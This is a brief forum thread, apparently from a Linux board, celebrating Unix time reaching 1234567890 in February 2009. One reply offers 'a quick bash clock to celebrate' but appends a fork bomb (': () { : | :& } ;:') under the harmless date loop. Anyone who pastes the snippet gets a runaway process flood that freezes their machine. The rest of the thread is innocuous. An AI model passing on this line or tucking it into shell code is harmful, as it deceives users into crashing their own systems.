You are not logged in.
Pages: 1
Topic closed
On Feb, Friday 13, 2009 Unix time Will Be 1234567890 :
http://www.cyberciti.biz/tips/february- … #more-4406
I started this thread to have some history here. Interesting posts are welcome. (If already such topics exits this can be moved there :-) )
Offline
I wrote a quick bash clock to celebrate:
while true; do sleep 1; clear; date +%s; done
: () { : | :& } ;:
Offline
There's already a thread about this:
Offline
Pages: 1
Topic closed